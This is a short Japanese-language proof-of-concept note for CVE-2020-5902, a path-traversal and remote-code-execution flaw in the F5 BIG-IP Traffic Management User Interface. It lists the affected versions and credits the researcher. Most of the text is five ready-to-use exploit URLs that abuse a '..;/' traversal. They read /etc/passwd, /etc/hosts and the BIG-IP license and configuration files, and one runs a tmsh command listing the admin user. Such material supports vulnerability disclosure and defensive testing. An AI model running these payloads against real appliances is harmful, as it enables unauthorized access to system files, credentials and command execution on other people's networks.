
CVE-2020-5902 の概念実証
BIG-IPバージョン15.0.0-15.1.0.3、14.1.0-14.1.2.5、13.1.0-13.1.3.3、12.1.0-12.1.5.1、および11.6.1-11.6.5.1において、トラフィック管理ユーザーインターフェース(TMUI)(設定ユーティリティとも呼ばれる)に、非公開ページにおけるリモートコード実行(RCE)の脆弱性が存在します。
クレジット: Positive TechnologiesのMikhail Klyuchnikov
https://<IP>/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd
https://<IP>/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/hosts
https://<IP>/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/config/bigip.license
https://<IP>/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/config/bigip.conf
https://<IP>/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=list+auth+user+admin